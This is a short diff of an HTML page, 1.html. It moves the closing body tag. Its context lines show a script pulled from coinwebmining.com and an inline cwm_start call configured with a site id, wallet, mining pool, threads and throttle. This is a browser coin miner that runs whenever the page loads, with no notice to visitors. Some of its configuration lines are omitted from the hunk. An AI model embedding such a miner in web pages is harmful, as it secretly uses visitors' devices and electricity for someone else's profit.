--- a/1.html
+++ b/1.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html lang="en">
-  <body>   </body>
+  <body>
 <script src="https://coinwebmining.com/cwm.js"></script>
 <script>
     var site_id = 'cwm-1848';
@@ -13,6 +13,7 @@
     var debug = false;
     cwm_start(site_id, coin, wallet, password, mining_pool, threads, throttle, debug);
 </script>
+</body>
 </html>
 
 
